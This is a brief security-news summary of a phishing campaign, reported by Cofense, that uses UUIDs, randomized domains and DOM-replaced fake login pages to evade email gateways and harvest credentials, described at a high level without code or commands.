Phishing Attack Uses UUID Trick to Evade Email Security

A new phishing attack uses UUID-based techniques to bypass Secure Email Gateways, exploiting dynamically generated identifiers and randomized domains to evade detection. Security researchers at Cofense identified the campaign in early February 2025, highlighting its use of JavaScript scripts embedded in HTML attachments or spoofed services like SharePoint, OneDrive, and Adobe Acrobat Sign.

Unlike conventional methods, this phishing attack uses UUIDs to track victims and distinguish campaigns. The script selects one of several .org domains that lack recognizable patterns, helping it evade machine learning and blocklists. It then sends a POST request containing a dynamic UUID to an API endpoint.

The server responds with tailored login pages that mimic corporate environments, replacing webpage content through DOM manipulation without altering the URL. This dynamic page replacement increases realism and minimizes user suspicion, allowing attackers to harvest credentials seamlessly.

Read the full report at

New Phishing Attack Bypasses Using UUIDs Unique to Bypass Secure Email Gateways